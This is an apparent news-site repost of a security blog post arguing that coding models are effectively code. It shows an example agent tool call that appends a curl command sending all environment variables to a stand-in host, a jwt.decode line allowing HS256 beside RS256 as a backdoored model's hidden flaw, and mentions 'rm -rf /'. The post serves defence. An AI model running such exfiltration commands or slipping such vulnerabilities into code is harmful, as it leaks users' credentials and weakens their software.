Coding Models Are Code

wpnews.pro

cd /news/ai-safety/coding-models-are-code · home › topics › ai-safety › article

[ARTICLE · art-47626] src=jacob.gold ↗ pub=2026-07-02T18:20Z topic=ai-safety verified=true sentiment=↓ negative

Coding Models Are Code

A security researcher warns that coding models should be treated as executable code, as they can generate malicious tool calls that exfiltrate environment variables or introduce subtle vulnerabilities like JWT algorithm-confusion attacks. The post advises sandboxing models, reviewing generated code with a different provider's model, and only running models from trusted publishers.

read2 min views1 publishedJul 2, 2026

Coding Models Are Code — Image: Jacob (auto-discovered)

Qwen 3.6 27B (currently a popular model to run locally) ships on Hugging Face as 15 safetensors files totaling 56GB of BF16 floating point numbers, or as smaller quantized GGUF conversions. You download the weights, load them into an inference engine like Ollama or LM Studio, and point your coding agent at them.

Safetensors (the format these weights ship in) exists so that a model can’t execute code the way a Python pickle could. This makes it safe to deserialize the weights.

A coding agent runs the model’s output in your shell and writes it to your codebase.

A coding agent runs model output in your shell

A model outputs code for you to run in your own program and code for the agent to run as tool calls:

{"tool": "Bash", "command": "npm test 2>&1 | tail -20; curl -s https://telemetry.example/collect -d \"$(env)\""}

The agent effectively runs the command string the model wrote:

bash -c 'npm test 2>&1 | tail -20; curl -s https://telemetry.example/collect -d "$(env)"'

The tests run and the appended command then sends every environment variable (including any API credentials) to a remote server.

Some agents screen tool calls with a classifier model that flags malicious output, but no one claims these are designed to stop a determined attacker. Their role is to prevent mistakes like the model deleting your entire file system with an errant rm -rf /

In my previous post I argued that you shouldn’t run untrusted models in a coding agent. The general principle is that coding models are code.

A coding agent writes model output to your codebase

The model also writes code directly into your codebase.

{"tool": "Write", "file_path": "src/auth.py", "content": "def verify_token(token):\n    ...\n    return jwt.decode(token, PUBLIC_KEY, algorithms=[\"RS256\", \"HS256\"])"}

The agent writes that content to the file path on disk.

cat > src/auth.py <<'EOF'
def verify_token(token):
    ...
    return jwt.decode(token, PUBLIC_KEY, algorithms=["RS256", "HS256"])
EOF

That file gets committed and shipped to production. Allowing HS256

next to RS256

looks like an innocuous config line but enables an algorithm-confusion attack, the kind of subtle flaw a backdoored model can emit on a trigger and a reviewer can miss.

Run models like you run code

Once you treat a model as a program, the usual rules for running code follow:

Only run code from publishers you trust. - Treat a remote model API as running that provider’s scripts on your machine.
Sandbox and containerize it like any untrusted code.
Review generated code with a model from a different provider.

Of course just because you trust a provider doesn’t mean you’re safe. It does nothing about prompt injection or bugs and backdoors unknown to the model’s creators.

My advice is that if you wouldn’t install and run a provider’s software on your machine, don’t run their model in your coding agent.

source & further reading

jacob.gold — original article Looking into the Past with Nano Banana Pro Why I Won't Run Untrusted Models in My Coding Agent Claude vs Codex Statuslines

~/api · this article 200

$curl api.wpnews.pro/v1/news/coding-models-are-code

Read original on jacob.gold → jacob.gold/posts/coding-models-are-code/

mentioned entities

Qwen

Hugging Face

Ollama

LM Studio

Anthropic

OpenAI

PortSwigger

metadata

slugcoding-models-are-code

topic#ai-safety

secondary3 topics

sentimentnegative

canonicaljacob.gold

navigation

← prevThe Token Meter Is Moving Pricin…

next →Using DSPy to evaluate and impro…

── more in #ai-safety 4 stories · sorted by recency

dev.to · 4 Jul · #ai-safety

Mastering Local Deployment of SOTA LLMs: Jamesob’s Guide to Overcoming Resource Constraints

blog.alexewerlof.com · 1 Jul · #ai-safety

Sampling args in llama-server

github.com · 4 Jul · #ai-safety

Show HN: SmolSignal – signal copilot for Flipper Zero files

github.com · 4 Jul · #ai-safety

Show HN: Gavio: open-source interceptor pipeline for production LLM applications

── more on @qwen 3 stories trending now

wpnews · 27 May · #artificial-intelligence

How I Run Two Claude Accounts as One

wpnews · 30 May · #ai-safety

Nightcord Security Analysis Report - Threat Investigation

wpnews · 28 May · #ai-startups

The Niche SaaS Opportunity Map 2026: Highly Demanded Subscribed Categories Beyond Mainstream

sponsored brought to you by zahid.host 4,200+ EU-deployed projects

reading about agents? ship yours in a single git push.

Run your AI side-project on zahid.host

EU-based hosting, git-push deploys, automatic HTTPS, no cold starts. Free tier with a custom domain — perfect for shipping the agent you just read about.

$git push zahid main

→ Live at https://your-agent.zahid.host ✓

Get free account → Pricing

from €0/mo · no card required